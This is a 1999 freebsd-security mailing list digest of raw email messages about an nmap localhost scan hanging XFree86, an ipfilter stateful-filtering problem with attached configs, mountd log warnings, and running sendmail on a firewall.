Subject: nmap portscan hangs X server? Message-ID: <19991104232444.A590@saturn.kn-bremen.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just installed nmap from ports and found out when i simply do a nmap 127.0.0.1 it'll hang the X server. (XFree86, not the latest version, mind you) Can anyone reproduce this? Be sure you can login over the net (or a serial tty) when you try this to be able to reboot the box as the console will be unusable after this. (otherwise you'll have to reset and wait for the fsck.) Btw a nmap -sS -O 127.0.0.1 will not hang it, which is what i tried first (from xnmap. this is probably to be expected as listening processes won't notice this type of portscan.) Anyway, for now I'm starting it with -nolisten tcp... (X has already been blocked from the outside in ipfw so i might as well do that too. but if you do need to display remote programs and ssh is too slow...) Oh and I tried some searching on the web but found no mention of this. Regards, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 14:49:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from hermes.la.csiro.au (hermes.la.csiro.au [152.83.12.2]) by hub.freebsd.org (Postfix) with ESMTP id BD4E8156E2 for ; Thu, 4 Nov 1999 14:48:49 -0800 (PST) (envelope-from Anthony.Wyatt@its.csiro.au) Received: by hermes.la.csiro.au with Internet Mail Service (5.5.2448.0) id ; Fri, 5 Nov 1999 09:43:10 +1100 Message-ID: From: "Wyatt, Anthony" To: "'freebsd-security@FreeBSD.ORG'" Subject: ipfilter too secure... Date: Fri, 5 Nov 1999 09:43:10 +1100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01BF2715.F8653BE6" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01BF2715.F8653BE6 Content-Type: text/plain; charset="iso-8859-1" Hi, I don't know where to post this, so this is where it's going :-) I think this is a bug (perhaps a user bug but a bug none the less). I installed ipfilter on a Solaris box the day before yesterday and got it up and running. I rebuilt my FreeBSD box yesterday (to 3.3-current ), but I can't get the stateful filtering to work properly. Of most annoyance, is the timeout of my ssh sessions to the FreeBSD box, even though I have made a full connection, 120 seconds is my limit. I did a ipfstat -s and the ttl starts at about 120 and the state never changes from 0/4. I use the exact same ruleset on the Solaris box and it does change the state from 0/4 to 4/4 and ttl to 5 days... I'll attach my kernel config, the ipfilter I'm using and my dmesg output at the bottom incase I've done something weird. If this isn't the place for this can you point me in the right direction. Thanks, Anthony <> <> <> ------_=_NextPart_000_01BF2715.F8653BE6 Content-Type: text/plain; name="dmesg.txt" Content-Disposition: attachment; filename="dmesg.txt" Copyright (c) 1992-1999 FreeBSD Inc. Copyright (c) 1982, 1986, 1989, 1991, 1993 The Regents of the University of California. All rights reserved. FreeBSD 3.3-STABLE #6: Fri Nov 5 08:00:07 EST 1999 root@hades-mi.cbr.its.csiro.au:/usr/src/sys/compile/LAPTOP Timecounter "i8254" frequency 1193182 Hz CPU: Pentium II/Xeon/Celeron (267.27-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x650 Stepping = 0 Features=0x183f9ff real memory = 134217728 (131072K bytes) avail memory = 126406656 (123444K bytes) Preloaded elf kernel "kernel" at 0xc03f7000. Preloaded elf module "splash_bmp.ko" at 0xc03f709c. Preloaded splash_image_data "/boot/splash.bmp" at 0xc03f7140. Pentium Pro MTRR support enabled splash_bmp: No appropriate video mode found module_register_init: module_register(splash_bmp, c0332694, 0) error 19 Probing for devices on PCI bus 0: chip0: rev 0x02 on pci0.0.0 vga0: rev 0x00 int a irq 11 on pci0.2.0 pcic0: rev 0x01 int a irq 11 on pci0.3.0 pcic1: rev 0x01 int b irq 11 on pci0.3.1 chip1: rev 0x01 on pci0.7.0 ide_pci0: rev 0x01 on pci0.7.1 chip2: rev 0x01 on pci0.7.3 Probing for PnP devices: Probing for devices on the ISA bus: sc0 on isa sc0: VGA color <16 virtual consoles, flags=0x0> atkbdc0 at 0x60-0x6f on motherboard atkbd0 irq 1 on isa psm0 irq 12 on isa psm0: model Generic PS/2 mouse, device ID 0 sio0 at 0x3f8-0x3ff irq 4 flags 0x10 on isa sio0: type 16550A sio1 at 0x2f8-0x2ff irq 3 on isa sio1: type 16550A fdc0 at 0x3f0-0x3f7 irq 6 drq 2 on isa fdc0: FIFO enabled, 8 bytes threshold fd0: 1.44MB 3.5in wdc0 at 0x1f0-0x1f7 irq 14 on isa wdc0: unit 0 (wd0): wd0: 3909MB (8007552 sectors), 7944 cyls, 16 heads, 63 S/T, 512 B/S wdc1 not found at 0x170 wt0 not found at 0x300 mcd0 not found at 0x300 matcdc0 not found at 0x230 scd0 not found at 0x230 ppc0 at 0x378 irq 7 flags 0x40 on isa ppc0: SMC-like chipset (ECP/EPP/PS2/NIBBLE) in COMPATIBLE mode ppc0: FIFO with 16/16/8 bytes threshold lpt0: on ppbus 0 lpt0: Interrupt-driven port ppi0: on ppbus 0 plip0: on ppbus 0 xe0: probe xe0 not found adv0 not found at 0x330 bt0 not found at 0x134 aha0 not found at 0x134 vga0 at 0x3b0-0x3df maddr 0xa0000 msize 131072 on isa npx0 on motherboard npx0: INT 16 interface PC-Card VLSI 82C146 (5 mem & 2 I/O windows) pcic: controller irq 5 Initializing PC-card drivers: sio xe IP Filter: initialized. Default = pass all, Logging = enabled changing root device to wd0s2a Card inserted, slot 1 xe: Probing for unit 0 xe0: attach xe0: Xircom CEM56, bonding version 0x55, 100Mbps capable, with modem xe0: DingoID = 0x444b, RevisionID = 0, VendorID = 0 xe0: Ethernet address 00:10:a4:f1:b2:ea xe0: hard_reset xe0: setmedia xe0: disable_intr xe0: init xe0: setmedia xe0: disable_intr xe0: soft_reset xe0: silicon revision = 5 xe0: disable_intr xe0: MII registers: 0:3400 1:7809 4:01e1 5:0000 6:0000 xe0: setmedia xe0: disable_intr xe0: init xe0: enable_intr xe0: init xe0: enable_intr xe0: init xe0: enable_intr xe0: media_status xe0: media_status ------_=_NextPart_000_01BF2715.F8653BE6 Content-Type: text/plain; name="ipf.config.txt" Content-Disposition: attachment; filename="ipf.config.txt" # MYIP is changed dynamically after I get my DHCP address # block in log quick from any to any with ipopts block in log quick proto tcp from any to any with short # # Head of trees # pass out on xe0 all head 150 pass in on xe0 all head 100 # # Anti spoofing # block in log quick on xe0 from 192.168.0.0/16 to any group 100 block in log quick on xe0 from 172.16.0.0/12 to any group 100 block in log quick on xe0 from 10.0.0.0/8 to any group 100 block in log quick on xe0 from 127.0.0.0/8 to any group 100 block in log quick on xe0 from MYIP/32 to any group 100 # # Allow only on the box to do anything # pass out quick on xe0 proto tcp/udp from MYIP/32 to any keep state group 150 pass out quick on xe0 proto icmp from MYIP/32 to any keep state group 150 # # Allow anyone ssh, and icmp, and hades to udp to us # pass in quick on xe0 proto udp from ANOTHERHOST/32 to MYIP/32 group 100 pass in quick on xe0 proto tcp from any to MYIP/32 port = 22 flags S/SA keep frags group 100 pass in quick on xe0 proto icmp from any to MYIP/32 group 100 # # Instead of dropping crap directed at us, pretend there is nothing there :-) # block return-rst in log quick on xe0 proto tcp from any to MYIP/32 group 100 block return-icmp(port-unr) in log quick on xe0 proto udp from any to MYIP/32 group 100 # # Block all the rest # block in quick on xe0 all group 100 block out log quick on xe0 all group 150 ------_=_NextPart_000_01BF2715.F8653BE6 Content-Type: text/plain; name="kernel.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="kernel.txt" # # LAPTOP -- Generic machine with WD/AHx/NCR/BTx family disks # # For more information on this file, please read the handbook section = on # Kernel Configuration Files: # # http://www.freebsd.org/handbook/kernelconfig-config.html # # The handbook is also available locally in /usr/share/doc/handbook # if you've installed the doc distribution, otherwise always see the # FreeBSD World Wide Web server (http://www.FreeBSD.ORG/) for the # latest information. # # An exhaustive list of options and more detailed explanations of the # device lines is also present in the ./LINT configuration file. If you = are # in doubt as to the purpose or necessity of a line, check first in = LINT. # # $FreeBSD: src/sys/i386/conf/LAPTOP,v 1.143.2.19 1999/08/29 16:05:18 = peter Exp $ machine "i386" #cpu "I386_CPU" #cpu "I486_CPU" #cpu "I586_CPU" cpu "I686_CPU" ident LAPTOP maxusers 32 #options MATH_EMULATE #Support for x87 emulation options INET #InterNETworking options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options MFS #Memory Filesystem options MFS_ROOT #MFS usable as root device, "MFS" req'ed options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, "NFS" req'ed options MSDOSFS #MSDOS Filesystem options "CD9660" #ISO 9660 Filesystem options "CD9660_ROOT" #CD-ROM usable as root. "CD9660" req'ed options PROCFS #Process filesystem options "COMPAT_43" #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=3D15000 #Be pessimistic about Joe SCSI device options UCONSOLE #Allow users to grab the console options FAILSAFE #Be conservative options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor config kernel root on wd0 # To make an SMP kernel, the next two are needed #options SMP # Symmetric MultiProcessor Kernel #options APIC_IO # Symmetric (APIC) I/O # Optionally these may need tweaked, (defaults shown): #options NCPU=3D2 # number of CPUs #options NBUS=3D4 # number of busses #options NAPIC=3D1 # number of IO APICs #options NINTR=3D24 # number of INTs controller isa0 controller pnp0 controller eisa0 controller pci0 controller fdc0 at isa? port "IO_FD1" bio irq 6 drq 2 disk fd0 at fdc0 drive 0 disk fd1 at fdc0 drive 1 options "CMD640" # work around CMD640 chip deficiency controller wdc0 at isa? port "IO_WD1" bio irq 14 disk wd0 at wdc0 drive 0 disk wd1 at wdc0 drive 1 controller wdc1 at isa? port "IO_WD2" bio irq 15 disk wd2 at wdc1 drive 0 disk wd3 at wdc1 drive 1 options ATAPI #Enable ATAPI support for IDE bus options ATAPI_STATIC #Don't do it as an LKM device acd0 #IDE CD-ROM device wfd0 #IDE Floppy (e.g. LS-120) # A single entry for any of these controllers (ncr, ahb, ahc) is # sufficient for any number of installed devices. controller ncr0 controller ahb0 controller ahc0 controller isp0 # This controller offers a number of configuration options, too many to # document here - see the LINT file in this directory and look up the # dpt0 entry there for much fuller documentation on this. controller dpt0 controller adv0 at isa? port ? cam irq ? controller adw0 controller bt0 at isa? port ? cam irq ? controller aha0 at isa? port ? cam irq ? controller scbus0 device da0 device sa0 device pass0 device cd0 #Only need one of these, the code dynamically grows device wt0 at isa? port 0x300 bio irq 5 drq 1 device mcd0 at isa? port 0x300 bio irq 10 controller matcd0 at isa? port 0x230 bio device scd0 at isa? port 0x230 bio # atkbdc0 controlls both the keyboard and the PS/2 mouse controller atkbdc0 at isa? port IO_KBD tty device atkbd0 at isa? tty irq 1 device psm0 at isa? tty irq 12 device vga0 at isa? port ? conflicts # splash screen/screen saver pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? tty # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? tty #options XSERVER # support for X server #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the = PCVT lines #options PCVT_SCANSET=3D2 # IBM keyboards are non-std device npx0 at isa? port IO_NPX irq 13 # # Laptop support (see LINT for more options) # device apm0 at isa? disable flags 0x31 # Advanced Power Management # PCCARD (PCMCIA) support controller card0 device pcic0 at card? device pcic1 at card? device sio0 at isa? port "IO_COM1" flags 0x10 tty irq 4 device sio1 at isa? port "IO_COM2" tty irq 3 device sio2 at isa? disable port "IO_COM3" tty irq 5 device sio3 at isa? disable port "IO_COM4" tty irq 9 # Parallel port device ppc0 at isa? port? flags 0x40 net irq 7 controller ppbus0 device lpt0 at ppbus? device plip0 at ppbus? device ppi0 at ppbus? #controller vpo0 at ppbus? # # The following Ethernet NICs are all PCI devices. # #device al0 # ADMtek AL981 (``Comet'') #device ax0 # ASIX AX88140A #device de0 # DEC/Intel DC21x4x (``Tulip'') #device fxp0 # Intel EtherExpress PRO/100B (82557, 82558) #device mx0 # Macronix 98713/98715/98725 (``PMAC'') #device pn0 # Lite-On 82c168/82c169 (``PNIC'') #device rl0 # RealTek 8129/8139 #device sf0 # Adaptec AIC-6915 DuraLAN (``Starfire'') #device tl0 # Texas Instruments ThunderLAN #device tx0 # SMC 9432TX (83c170 ``EPIC'') #device vr0 # VIA Rhine, Rhine II #device vx0 # 3Com 3c590, 3c595 (``Vortex'') #device wb0 # Winbond W89C840F #device xl0 # 3Com 3c90x (``Boomerang'', ``Cyclone'') # Order is important here due to intrusive probes, do *not* alphabetize # this list of network interfaces until the probes have been fixed. # Right now it appears that the ie0 must be probed before ep0. See # revision 1.20 of this file. #device ed0 at isa? port 0x280 net irq 10 iomem 0xd8000 #device ie0 at isa? port 0x300 net irq 10 iomem 0xd0000 #device ep0 at isa? port 0x300 net irq 10 #device ex0 at isa? port? net irq? #device fe0 at isa? port 0x300 net irq ? #device le0 at isa? port 0x300 net irq 5 iomem 0xd0000 #device lnc0 at isa? port 0x280 net irq 10 drq 0 device xe0 at isa? port? net irq ? #device ze0 at isa? port 0x300 net irq 10 iomem 0xd8000 #device zp0 at isa? port 0x300 net irq 10 iomem 0xd8000 #device cs0 at isa? port 0x300 net irq ? pseudo-device loop pseudo-device ether pseudo-device sl 1 pseudo-device ppp 1 pseudo-device tun 1 pseudo-device pty 16 pseudo-device gzip # Exec gzipped a.out's # KTRACE enables the system-call tracing facility ktrace(2). # This adds 4 KB bloat to your kernel, and slightly increases # the costs of each syscall. options KTRACE #kernel tracing # This provides support for System V shared memory and message queues. # options SYSVSHM options SYSVMSG options SYSVSEM # The `bpfilter' pseudo-device enables the Berkeley Packet Filter. Be # aware of the legal and administrative consequences of enabling this # option. The number of devices determines the maximum number of # simultaneous BPF clients programs runnable. pseudo-device bpfilter 4 #Berkeley packet filter #options IPFIREWALL #firewall #options IPFIREWALL_VERBOSE #print information about # dropped packets #options "IPFIREWALL_VERBOSE_LIMIT=3D100" #limit verbosity options IPFILTER options IPFILTER_LOG ------_=_NextPart_000_01BF2715.F8653BE6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 16:48:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.webct.com (mail.webct.com [209.87.17.10]) by hub.freebsd.org (Postfix) with ESMTP id 0DA2214D2B for ; Thu, 4 Nov 1999 16:48:29 -0800 (PST) (envelope-from dfoo@ca.webct.com) Received: from ca.webct.com (ws74.webct.com [209.87.17.104]) by mail.webct.com (8.9.3/8.9.3) with ESMTP id QAA31852 for ; Thu, 4 Nov 1999 16:46:23 -0800 (PST) Message-ID: <382228DF.D707327A@ca.webct.com> Date: Thu, 04 Nov 1999 16:46:23 -0800 From: Darren Foo Reply-To: dfoo@webct.com Organization: ULT Canada X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.3-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: "'freebsd-security@FreeBSD.ORG'" Subject: kernel messages... Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I keep getting this message repeatedly: Nov 1 09:49:46 mail mountd[133]: umountall request from 209.87.17.10 from unpri vileged port Nov 1 13:46:31 mail mountd[133]: umountall request from 209.87.17.10 from unpri vileged port Could this be a security issue? We are running NFS and NIS openly. -- Darren Foo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 17:10:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from athserv.otenet.gr (athserv.otenet.gr [195.170.0.1]) by hub.freebsd.org (Postfix) with ESMTP id A25A11511A for ; Thu, 4 Nov 1999 17:10:04 -0800 (PST) (envelope-from keramida@diogenis.ceid.upatras.gr) Received: from hades.hell.gr (patr530-a065.otenet.gr [195.167.115.65]) by athserv.otenet.gr (8.9.3/8.9.3) with SMTP id DAA15536 for ; Fri, 5 Nov 1999 03:09:13 +0200 (EET) Received: (qmail 2560 invoked by uid 1001); 5 Nov 1999 00:56:41 -0000 To: freebsd-security@freebsd.org Subject: Re: nmap portscan hangs X server? References: <19991104232444.A590@saturn.kn-bremen.de> From: Giorgos Keramidas Date: 05 Nov 1999 02:56:41 +0200 In-Reply-To: Juergen Lock's message of "Thu, 4 Nov 1999 23:24:44 +0100" Message-ID: <86eme569iu.fsf@localhost.hell.gr> Lines: 17 X-Mailer: Gnus v5.6.45/XEmacs 21.1 - "20 Minutes to Nikko" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Juergen Lock writes: > I just installed nmap from ports and found out when i simply do a > > nmap 127.0.0.1 > > it'll hang the X server. (XFree86, not the latest version, mind you) > Can anyone reproduce this? Be sure you can login over the net (or a Yep, it did creahs my box too. Pity I can't use a network connection to kill the offending X server. Can't find anything in the logs that says how this happen though. Probably because I had to hit the big red button to recover my console, after the necessary reboot + fsck. -- Giorgos Keramidas, "What we have to learn to do, we learn by doing." [Aristotle] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 17:51: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id B3BC014BEA for ; Thu, 4 Nov 1999 17:50:58 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id UAA22253; Thu, 4 Nov 1999 20:52:53 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199911050152.UAA22253@cc942873-a.ewndsr1.nj.home.com> Subject: Re: kernel messages... In-Reply-To: <382228DF.D707327A@ca.webct.com> from Darren Foo at "Nov 4, 1999 04:46:23 pm" To: dfoo@webct.com Date: Thu, 4 Nov 1999 20:52:53 -0500 (EST) Cc: freebsd-security@FreeBSD.ORG ('freebsd-security@FreeBSD.ORG') Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Foo wrote, > I keep getting this message repeatedly: > Nov 1 09:49:46 mail mountd[133]: umountall request from 209.87.17.10 > from unpri > vileged port > Nov 1 13:46:31 mail mountd[133]: umountall request from 209.87.17.10 > from unpri > vileged port > > Could this be a security issue? We are running NFS and NIS openly. There very well could be a security problem in there somewhere. I finally got around to submitting a PR about this today. See PR bin/14709, "umountall requests possibly mishandled by mountd(8)." -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 18:42: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id 4D510156BD for ; Thu, 4 Nov 1999 18:41:57 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id DAA24896; Fri, 5 Nov 1999 03:38:39 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id DAA07673; Fri, 5 Nov 1999 03:31:37 +0100 (MET) Date: Fri, 5 Nov 1999 03:31:37 +0100 (MET) From: Juergen Lock Message-Id: <199911050231.DAA07673@saturn.kn-bremen.de> To: keramida@ceid.upatras.gr Subject: Re: nmap portscan hangs X server? X-Newsgroups: local.list.freebsd.security In-Reply-To: <86eme569iu.fsf@localhost.hell.gr> References: <19991104232444.A590@saturn.kn-bremen.de> Organization: home Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article <86eme569iu.fsf@localhost.hell.gr> you write: >Juergen Lock writes: > >> I just installed nmap from ports and found out when i simply do a >> >> nmap 127.0.0.1 >> >> it'll hang the X server. (XFree86, not the latest version, mind you) >> Can anyone reproduce this? Be sure you can login over the net (or a > >Yep, it did creahs my box too. Pity I can't use a network connection to >kill the offending X server. Can't find anything in the logs that says >how this happen though. Probably because I had to hit the big red >button to recover my console, after the necessary reboot + fsck. I since found this in the hung server's stdout/stderr log: _XSERVTransSocketINETGetPeerAddr: getpeername() failed: 57 _XSERVTransSocketINETAccept: ...SocketINETGetPeerAddr() failed: but why it decides to not process anything anymore from its other sockets after that i still have no idea. :( Btw is your X the latest? And if not, anyone who runs it want to give this a test? If it still happens its probably worth a bug report to the XFree86 people... Regards, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 19:33:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from athserv.otenet.gr (athserv.otenet.gr [195.170.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 677B1157FF for ; Thu, 4 Nov 1999 19:33:50 -0800 (PST) (envelope-from keramida@diogenis.ceid.upatras.gr) Received: from hades.hell.gr (patr530-a107.otenet.gr [195.167.115.107]) by athserv.otenet.gr (8.9.3/8.9.3) with SMTP id FAA07883 for ; Fri, 5 Nov 1999 05:33:40 +0200 (EET) Received: (qmail 12692 invoked by uid 1001); 5 Nov 1999 03:27:20 -0000 To: Juergen Lock Cc: freebsd-security@FreeBSD.ORG Subject: Re: nmap portscan hangs X server? References: <19991104232444.A590@saturn.kn-bremen.de> <199911050231.DAA07673@saturn.kn-bremen.de> From: Giorgos Keramidas Date: 05 Nov 1999 05:27:20 +0200 In-Reply-To: Juergen Lock's message of "Fri, 5 Nov 1999 03:31:37 +0100 (MET)" Message-ID: <86r9i562jr.fsf@localhost.hell.gr> Lines: 14 X-Mailer: Gnus v5.6.45/XEmacs 21.1 - "20 Minutes to Nikko" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Juergen Lock writes: > Btw is your X the latest? And if not, anyone who runs it want to give > this a test? If it still happens its probably worth a bug report to the > XFree86 people... I am running XFree-3.3.2, which is not the latest. It is the version that came with my FreeBSD 3.0-RELEASE CDs. I have neglected to upgrade XFree because doing it over my 28.8 Kbit/sec modem costs like hell in Greece where I live. Perhaps I should try to upgrade and see if it still hangs... -- Giorgos Keramidas, "What we have to learn to do, we learn by doing." [Aristotle] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 20:37:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.mco.bellsouth.net (mail1.mco.bellsouth.net [205.152.48.13]) by hub.freebsd.org (Postfix) with ESMTP id 1C39F14DD3 for ; Thu, 4 Nov 1999 20:37:36 -0800 (PST) (envelope-from bertke@bellsouth.net) Received: from bellsouth.net (adsl-78-197-184.sdf.bellsouth.net [216.78.197.184]) by mail1.mco.bellsouth.net (3.3.5alt/0.75.2) with ESMTP id XAA03530; Thu, 4 Nov 1999 23:36:16 -0500 (EST) Message-ID: <38225E5A.B691490E@bellsouth.net> Date: Fri, 05 Nov 1999 04:34:34 +0000 From: Bert Kellerman X-Mailer: Mozilla 4.61 [en] (X11; I; Linux 2.0.36 i386) X-Accept-Language: en MIME-Version: 1.0 To: Giorgos Keramidas Cc: Juergen Lock , freebsd-security@FreeBSD.ORG Subject: Re: nmap portscan hangs X server? References: <19991104232444.A590@saturn.kn-bremen.de> <199911050231.DAA07673@saturn.kn-bremen.de> <86r9i562jr.fsf@localhost.hell.gr> Content-Type: multipart/alternative; boundary="------------07AF5953B3CFAFB2B4C93A70" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------07AF5953B3CFAFB2B4C93A70 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I am running nmap 2.3BETA5 and X 3.3.5 on 3.3-STABLE and am not affected by this problem. Bert Giorgos Keramidas wrote: > Juergen Lock writes: > > > Btw is your X the latest? And if not, anyone who runs it want to give > > this a test? If it still happens its probably worth a bug report to the > > XFree86 people... > > I am running XFree-3.3.2, which is not the latest. It is the version that > came with my FreeBSD 3.0-RELEASE CDs. I have neglected to upgrade XFree > because doing it over my 28.8 Kbit/sec modem costs like hell in Greece where I > live. Perhaps I should try to upgrade and see if it still hangs... > > -- > Giorgos Keramidas, > "What we have to learn to do, we learn by doing." [Aristotle] > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --------------07AF5953B3CFAFB2B4C93A70 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit I am running nmap  2.3BETA5 and X 3.3.5 on 3.3-STABLE and am not affected by this problem.

Bert

Giorgos Keramidas wrote:

Juergen Lock <nox@jelal.kn-bremen.de> writes:

> Btw is your X the latest?  And if not, anyone who runs it want to give
> this a test?  If it still happens its probably worth a bug report to the
> XFree86 people...

I am running XFree-3.3.2, which is not the latest.  It is the version that
came with my FreeBSD 3.0-RELEASE CDs.  I have neglected to upgrade XFree
because doing it over my 28.8 Kbit/sec modem costs like hell in Greece where I
live.  Perhaps I should try to upgrade and see if it still hangs...

--
Giorgos Keramidas, <keramida@ceid.upatras.gr>
"What we have to learn to do, we learn by doing." [Aristotle]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

--------------07AF5953B3CFAFB2B4C93A70-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 21:59:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from tinker.com (troll.tinker.com [204.214.7.146]) by hub.freebsd.org (Postfix) with ESMTP id 6030314DC7 for ; Thu, 4 Nov 1999 21:59:29 -0800 (PST) (envelope-from carol@tinker.com) Received: by localhost (8.8.5/8.8.5) Received: by mail.tinker.com via smap (V2.0) id xma010350; Thu Nov 4 23:34:04 1999 Received: by localhost (8.8.8/8.8.8) id XAA23674; Thu, 4 Nov 1999 23:58:27 -0600 (CST) Message-ID: <38227105.43BA2183@tinker.com> Date: Thu, 04 Nov 1999 23:54:13 -0600 From: Carol Deihl Organization: Shrier and Deihl X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 2.2.8-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Wes Peters Cc: "Scott I. Remick" , freebsd-security@FreeBSD.ORG Subject: Re: Firewall questions References: <4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> <3821B920.F1A47745@softweyr.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wes Peters wrote: > > "Scott I. Remick" wrote: > > > > 2) Is sendmail necessary on a firewall? > > If you want to be able to send mail into the firewall, yes. For outgoing > mail, sendmail is called directly. Outgoing mail that has to be queued up, > for whatever reason, won't be resent unless you have sendmail running as > a daemon. > Actually, you don't need to have sendmail running as a daemon to resend queued mail. Just put something like this in your crontab (this one tries to resend twice an hour): # deliver mail that gets queued 5,35 * * * * root /usr/sbin/sendmail -q Carol -- Carol Deihl - principal, Shrier and Deihl - mailto:carol@tinker.com Remote Unix Network Admin, Security, Internet Software Development Tinker Internet Services - Superior FreeBSD-based Web Hosting http://www.tinker.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 23:19:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 8D1BD14D23 for ; Thu, 4 Nov 1999 23:19:26 -0800 (PST) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id XAA71639; Thu, 4 Nov 1999 23:16:26 -0800 (PST) (envelope-from dillon) Date: Thu, 4 Nov 1999 23:16:26 -0800 (PST) From: Matthew Dillon Message-Id: <199911050716.XAA71639@apollo.backplane.com> To: Carol Deihl Cc: Wes Peters , "Scott I. Remick" , freebsd-security@FreeBSD.ORG Subject: Re: Firewall questions References: <4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> <3821B920.F1A47745@softweyr.com> <38227105.43BA2183@tinker.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> If you want to be able to send mail into the firewall, yes. For outgoing :> mail, sendmail is called directly. Outgoing mail that has to be queued up, :> for whatever reason, won't be resent unless you have sendmail running as :> a daemon. :> : :Actually, you don't need to have sendmail running as a daemon to resend :queued mail. Just put something like this in your crontab (this one :tries to resend twice an hour): : :# deliver mail that gets queued :5,35 * * * * root /usr/sbin/sendmail -q : :Carol :-- :Carol Deihl - principal, Shrier and Deihl - mailto:carol@tinker.com You don't have to run sendmail from cron, you can run it as a daemon *without* having it listen on port 25. It is simply: sendmail -q30m (note that there is no '-bd'). If you have the MaxDaemonChildren option set properly, running it this way is much safer then running it from cron. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 5 10:35:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de 